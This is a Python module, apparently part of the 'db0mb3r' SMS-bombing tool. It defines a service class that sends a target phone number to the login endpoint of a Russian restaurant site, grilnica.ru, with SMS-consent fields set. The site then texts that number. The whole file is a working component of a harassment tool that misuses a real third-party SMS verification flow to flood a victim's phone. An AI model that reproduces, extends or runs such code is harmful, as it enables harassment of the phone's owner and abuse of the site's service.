grilnica.py 445 B

123456789101112131415161718
  1. from db0mb3r.services.service import Service
  2. class Grillnica(Service):
  3. phone_codes = [7]
  4. async def run(self):
  5. await self.post(
  6. "https://grilnica.ru/loginphone/",
  7. data={
  8. "step": 0,
  9. "phone": self.format(self.formatted_phone, "+* (***) ***-****"),
  10. "code": "",
  11. "allow_sms": "on",
  12. "apply_offer": "on",
  13. },
  14. )